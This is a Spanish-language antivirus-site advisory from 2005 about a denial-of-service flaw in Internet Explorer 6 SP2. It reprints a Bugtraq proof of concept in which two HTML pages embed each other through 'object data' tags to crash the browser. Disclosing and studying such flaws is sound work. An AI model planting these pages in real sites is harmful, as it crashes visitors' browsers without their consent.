Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.
 

Busque su tema:

VSantivirus  Internet
Proporcionado por FreeFind

Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

       

DoS en Internet Explorer producido por "Object Data"
 
VSantivirus No. 1787 Año 9, domingo 29 de mayo de 2005

DoS en Internet Explorer producido por "Object Data"
http://www.vsantivirus.com/vul-iesp2-objectdata-280505.htm

Por Angela Ruiz
angela@videosoft.net.uy


Se ha reportado que Microsoft Internet Explorer es afectado por una vulnerabilidad del tipo denegación de servicio (DoS).

La vulnerabilidad se presenta cuando el navegador maneja páginas Web embebidas utilizando la etiqueta HTML "Object Data".

El fallo afecta a Microsoft Internet Explorer 6 SP2, con todas las actualizaciones a la fecha de este aviso.

Bugtraq ha publicado la siguiente prueba de concepto:

Página #1 (grabar como "btf1.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>

Página #2 (grabar como "btf2.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>


Software vulnerable:

- Microsoft Internet Explorer 6.0 SP2 (y posiblemente anteriores)


Soluciones:

Actualmente no existen parches para este problema.


Créditos:

Benjamin Tobias Franz <0-1-2-3@gmx.de>


Referencias:

- Identificado en BugTraq como ID 13800

Microsoft Internet Explorer Object Embedding Denial of Service Vulnerability
http://www.securityfocus.com/bid/13800/

- Referencia en FrSIRT: FrSIRT/ADV-2005-0646

Microsoft Internet Explorer Denial of Service Vulnerabilities
http://www.frsirt.com/english/advisories/2005/0646





(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2005 Video Soft BBS